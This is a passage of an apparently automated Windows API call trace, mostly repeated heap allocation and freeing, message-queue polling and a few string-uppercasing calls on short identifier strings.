returned 1 [0258.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.208] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.208] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0258.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0258.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.210] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0258.210] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0258.210] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0258.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0258.210] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0258.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0258.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dc8 [0258.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0258.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17a8 [0258.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa00 [0258.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0258.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0258.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0258.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0258.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0258.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0258.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0258.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8c8 [0258.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0258.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0258.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0258.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0258.213] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.213] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0258.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.214] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.214] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0258.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0258.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0258.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0258.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0258.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.215] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0258.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0258.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0258.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0258.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0258.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.216] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0258.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0258.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0258.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0258.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0258.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0258.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.217] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0258.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0258.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0258.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0258.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0258.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.217] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0258.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0258.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0258.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0258.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.218] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0258.219] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0258.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0258.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.219] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0258.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0258.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0258.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0258.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0258.219] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0258.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0258.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.220] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.220] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 